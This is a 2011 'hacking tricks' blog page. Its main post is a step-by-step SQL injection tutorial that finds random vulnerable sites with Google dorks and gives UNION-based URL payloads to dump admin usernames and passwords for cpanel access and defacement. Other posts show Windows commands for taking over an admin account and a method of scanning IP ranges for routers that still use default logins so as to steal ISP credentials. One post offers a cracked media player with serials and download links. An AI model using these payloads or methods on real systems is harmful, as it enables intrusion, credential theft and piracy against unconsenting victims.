This is featured post 1 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 2 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
This is featured post 3 title
Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.
Friday, 14 October 2011
How to Hack Websites using SQL Injection? A DETAILED TUTORIAL
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)
What will I need to perform an SQL Injection attack?
[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder (Use Havij)
[+] half a brain and the will to learn lol
NOW DOWNLOAD the EXPLOIT SCANNER FROM:
or
or
or
or
password: www.reiluke.i.ph
THE LIST OF GOOGLE DORKS ARE HERE:
Ok after you are done downloading the tools. Open the .rar located on your desktop. Now open the http://hackxack.blogspot.com/2011/10/google-dorks-for-sql-injetion.html. From this list you can pick any dork you feel like scanning with. For good search results search for a dork like this.
Code:
index.php?id=
After you have chose a dork like above, copy it into your clipboard for further use. Now open your exploit scanner.exe. (scanner made by reiluke). At the top where it says "Dork" your going to want to paste your dork into the box.
Atfer you have done this your going to want to switch your "Max Url" from 100 to 1000 for alot of search results. Then press scan on your exploit scanner. After it is done scanning your going to press "Test Sites". After all this is done you should have two lists.
After it is done testing all scanned sites. These pre-tested sites might be sqli vulnerable. But you must first check each site individually. To test a individual site add a " ' " after the url. For example.
Code:
sqlivulnerablesite.com/index.php?id=1'
*NOTE* With this exploit scanner it auto-quotes all the urls.
Lets say for instance you found a site that might be vulnerable (or what you think maybe a vulnerable site). If a error on the web page comes up something like this.
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Then its vulnerable to sql injection. The first step to this multi-step systematic attack on the sql databases is to found out the number of columns there is in the sql database. To found this out we use this code injection in the address bar after the website url. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--
Load the page. If the page loads correctly with that code injection in the url then we are on the right track
Knowing that there is already 1 column in this database we do another code injection. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--
If the page loads correctly again then this attack can still be performed.
Usually if the pages loads correctly after trying the #2 then I try stepping the number up to around 10.
*NOTE* If you load the web page on a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--
and you get a result like this.
Code:
Unknown column '10' in 'order clause'
Then you must go down a number until you reach the number of columns that is in the database where it allows the web page to load correctly without any errors on the web page. For instance since the error on the web page said "unknown column '10'" we must go down to the number 9. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--
If your page loads correctly then this means there is 9 columns in the database
The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--
After you have loaded the page it should show which columns are vulnerable. Usually shows about 2-3 columns. I personally use the the lowest number that is vulnerable. For instance "2". Lets say the vulnerable column in the database is "2". The next code injection we use is to found out the version of the database. Like This.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9
When the web page is loaded, where the number "2" was on the web page there should be in place of it the "database version". It is best if you a beginner to make sure the database version is 5.0 on higher like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--
After the page is loaded it should have all the table names on the web page. The table name that your going to want to find is admins. Once you have found admins or something that is similar to that, then we do another code injection to found out that columns which are in that table with this code.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--
*NOTE* Here (x) is the ascii value of the table name.
Now we must find the ascii value of the word admins.
The ascii value of admins is
Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;
Delete all the ";" , "#" , and "&". So it should look like this.
Code:
97,100,109,105,110,115
Now replace the the "x" with that ascii number code. Now your new code injection should look something like this. Enter it in your url address bar.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--
When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.
Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --
*NOTE* (0x3a) is the ascii value of the column name
When the page loads it should show the data of the username and password for cpanel access.
Now to access the cpanel we must find the login page. I provided a admin finder.exe in the .rar. Open it up and type in the url of your vulnerable site. From there it scan till it finds the login page for admin cpanel access. Which can lead to defacement and web server compromise.
Hopefully someone found this thread useful/helpful. I take full credit in writing this tutorial out. PM me if you need any further help with your sql injections!
Labels:
HACKING TRICKS
BS.PLayer Pro 2.57 Build 1051 [Free] [Crack] [Serial key]
BS.Player Pro - the best multimedia player (DivX, HD and AVC video, movie, audio, DVD) in the world! Ever since the very beginning in the year 2000, the BS.Player Pro has been one of the world's most popular multimedia players. It is popular for many reasons, one however should be pointed out: BS.Player Pro is the first player ever to enable its users to focus on watching the movie instead of dealing with poor computer capabilities or running around looking for a proper setting and codec.
BS.Player Pro is used by more than 70 millions of multi media users throughout the world and it has been translated into more than 90 world languages. All downloaded versions of our FREE version exceed the sum of all downloads of competitive media players and payable DivX or DVD players. Because it does not use much of the CPU processing resources for multimedia playback it is suitable for all those who use slightly less capable computers. Now, you can finally enjoy the playback of HD DVD and AVCHD movies of the highest quality with minimal system requirements. BS.Player can playback any YouTube movie directly from the internet and save it to local disk.
Most importantly, BS.Player Pro is a product for the world multi media market and is therefore equipped with a advanced subtitle options which enable the users to watch video content with subtitles from many popular subtitle formats (MicroDVD .sub, VobSub .sub + .idx, SubViewer .sub, (Advanced) SubStation Alpha .ssa or .ass, SubRip .srt, VPlayer .txt...). BS.Player is also a AVCHD player and enables you to display AVCHD video format movies (Advanced Video Codec High Definition) used in digital tapeless camcorders.
BS.Player Pro is the software movie and media player that supports all popular video and audio media file types, containers and formats such as: DivX, Xvid, avi, mpg, mpeg-1, mpeg-2, mpeg-4, 3ivx, YouTube streaming video, AVC HD (avchd player), QT QuickTime mov, RM Real media, OGM, Matroska , mkv, asf, wmv, DV, m1v, m2v, mp4, mpv, swf, vob and wav, mpa, mp1, mp2, mp3, Ogg, aac, DTS, Dolby Surround, Dolby digital DD 5.1 - AC3, aif, ram, wma, flv (Flash and YouTube Video) and much more!
Some great Features:
* Playback of AVCHD video new. (Advanced Video Codec High Definition) format used in Canon, JVC, Panasonic, and Sony digital tapeless camcorders.
* Support for global multimedia keys
* Play YouTube streaming including HD, High Quality and Normal resolution videonew
* Save YouTube streaming video to local disk (YouTube downloader)new
* DVD support
* Frame capture (video to picture)
* Sound Equalizer
* Custom aspect ratios
* Customizable Equalizer
* Support for Capture/Tuner devices (and Teletext support)
* Capture Video to file
* Integrated subtitle editor
* Network file buffering
* Support for Flash playback
* Fully skinnable windows (Media list, Play list, Equalizer)
* Bookmarks support (add, edit)
* Chapters support (create, move to, skip)
* Multiple audio stream switching
* Plugin support (Winamp DSP plugins and others)
* Multilingual interface
* Fast forward and fast rewind option
* Frame stepping (playback video one frame at a time)
* WinLIRC support (user defineable remote controllers)
* Support switching between multiple (different language) subtitles
* Pan-scan and custom pan-scan option
* Support for multiple audio streams and switching between them
* Every action can also be assigned to WinLIRC button
* Playback of incomplete AVI files and locked files (files in use, files still downloading or recording)
* Command line support (for example "bsplayer.exe movie.avi -fs" will start playback of movie in full screen mode)
* Support a lot of subtitles formats (MicroDVD, SubRip, Subviewer, etc), custom subtitles position, color, font, transparency.
* BSI/INI files support and dynamic DirectShow filters loading (so everything can be burned on CD and played without installing anything)
* Almost every action can be assigned to user selected key (even two keys) and different keys can be assigned for full screen and windowed mode
* Support for all popular media formats (audio and video): divx, avi, mpeg 1, mpeg 2, xvid, 3ivx, ogm, matroska, asf, wmv, DV, m1v, m2v, Quicktime mov, mp4, mpv, QT, Real rm, SWF, vob, wav, mpa, mp1, mp2, mp3, ogg, aac, ac3, aif, ram, wma and much more!
Compatible with: Windows 2000, XP, Vista and Win7 (32/64-bit )
Multilingual: English, Spanish, French, Italian, German, Russian, Portuguese, Slovak, Greek, etc
BsPlayer Pro 2.57 Build 1051 + Serials ( 100% working )
http://www.filesonic.com/file/184469541/BS.Player.Pro.2.57.1051.rar
http://oron.com/bc7mi223omu3
http://www.fileserve.com/file/hAPVAa4/BS.Player.Pro.2.57.1051.by.tano1221.rar
http://www.wupload.com/file/128675105/BS.Player.Pro.2.57.1051.by.tano1221.rar
http://www.megaupload.com/?d=T3YOAJFJ
http://www.mediafire.com/?bln1wfdajf6e9vw
https://rapidshare.com/files/2983624218/BS.Player.Pro.2.57.1051.by.tano1221.rar
Labels:
free pc software
Thursday, 13 October 2011
tricks To Hack Windows XP Login Password
Tricks To Hack Windows XP Login Password
Hack Admin Password From User Mode
Follow these steps:
1. Open command prompt (Start->Run->cmd),
2. Enter the following command, then press ENTER
3. Enter the following command, then press ENTER:
compmgmt.msc
This should open the computer management console.
4. Go to local users & groups->users. Right click on any user
and select “set password”.
4. Go to local users & groups->users. Right click on any user
and select “set password”.
If you get a “access denied” do the following:
start>run>cmd
start>run>cmd
Then use following commands:
1) net user test /add (this command will make test named user)
2) net local group administrators test /add (this command will make t
est user as administrators rights)and use net user command
to reset your admin password
2) net local group administrators test /add (this command will make t
est user as administrators rights)and use net user command
to reset your admin password
Alternative
What if u don’t know the password of your admin and still want
to hack and change ..
yes u can do it ..in a very easy manner.. check this.
to hack and change ..
yes u can do it ..in a very easy manner.. check this.
just follow the steps:
(this doesn’t require u to know the admin password but still u can change it..)
Start >> Run >> [type]cmd // this will open your command
prompt[type] net(space)user(press enter)[type]
net(space)user(space)[windowsloginid](sp ace)*(press enter)
prompt[type] net(space)user(press enter)[type]
net(space)user(space)[windowsloginid](sp ace)*(press enter)
// for e.g. : net user HOME *(press enter)
[type] new password (press enter) and retype it (press enter)..
it will show u confirmation… // caution it wont show u the password u type..
but it still types.. the blinking pointer will b there at the same place..
but it still works..
it will show u confirmation… // caution it wont show u the password u type..
but it still types.. the blinking pointer will b there at the same place..
but it still works..
// for e.g. : password changed successfully.
Labels:
HACKING TRICKS
How to Hack an Ethernet ADSL RouteR
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access and modify the router settings using a common set of default usernames and passwords. Here is how you can do it.
Before you proceed, you need the following tool in the process
Here is a detailed information on how to exploit the vulnerability of an ADSL router.
Step-1: Go to www.whatismyipaddress.com. Once the page is loaded you will find your IP address. Note it down.
Step-2: Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is 117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists atleast 200-300 IP addresses in the range.
Step-3: Go to Tools->Preferences and select the Ports tab. Under Port selectionenter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
Step-4: Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image.
Step-5: Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below.
If you do not succeed to gain access, select another IP from the list and repeat the step-5. Atleast 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.
What can an Attacker do by Gaining Access to the Router Settings?
By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings. So the victim has to reconfigure the router in order to bring it back to action.
The Verdict:
If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Labels:
HACKING TRICKS
Recover Master Password for your PHONE
Many times there are cases that you forget the main Security Master Password for your phone and it gets impossible to think about that password well in that case we have a website for you which will give you your master password after you provide them with ur IMEI number.
1. Go to this Website: http://www.nokialockcode.com/calculate.php
2. There is a BOX which says master code calculator just enter your IMEI number into that BOX and HIT Calculate.
3. It will than simply finalize the result by providing you with the IMEI Number.
Labels:
HACKING TRICKS
Reset Your Mobile Memory Card Password 2 minutes
We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.
In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)
Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626
Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
Labels:
HACKING TRICKS
Reset Your Mobile Memory Card Password 2 minutes
Reset Your Mobile Memory Card Password 2 minutes
# We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.
In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)
Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626
Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)
Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.
Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"
Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore
Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer
Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626
Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data
Labels:
HACKING TRICKS
Subscribe to:
Posts (Atom)